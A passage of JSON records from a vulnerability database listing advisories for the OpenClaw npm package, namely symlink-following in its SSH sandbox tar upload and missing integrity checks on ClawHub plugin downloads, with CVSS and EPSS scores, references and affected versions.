                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41335",
                "GHSA-hr8g-2q7x-3f4w"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c76v-4577-n7c6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89380?format=api",
            "vulnerability_id": "VCID-carm-gpgh-wbbf",
            "summary": "OpenClaw: SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n## Summary\nSSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28: SSH sandbox tar upload lacked pre-upload symlink escape rejection until 3d5af14984 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3d5af14984ac1976c747a8e11581d697bd0829dc` — 2026-03-31T19:56:45+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41364",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00191",
                            "scoring_system": "epss",
                            "scoring_elements": "0.40948",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00191",
                            "scoring_system": "epss",
                            "scoring_elements": "0.40921",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00191",
                            "scoring_system": "epss",
                            "scoring_elements": "0.40952",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41364"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41364",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41364"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fv94-qvg8-xqpw",
                    "reference_id": "GHSA-fv94-qvg8-xqpw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fv94-qvg8-xqpw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41364",
                "GHSA-fv94-qvg8-xqpw"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-carm-gpgh-wbbf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89367?format=api",
            "vulnerability_id": "VCID-cbuu-4d6c-rben",
            "summary": "OpenClaw B-M3: ClawHub package downloads are not enforced with integrity verification\n## Impact\n\nB-M3: ClawHub package downloads are not enforced with integrity verification.\n\nClawHub downloads could install plugin archives without enforcing archive or per-file integrity metadata.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42428",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.059",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05897",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05906",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42428"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42428",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42428"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3vvq-q2qc-7rmp",
                    "reference_id": "GHSA-3vvq-q2qc-7rmp",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3vvq-q2qc-7rmp"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
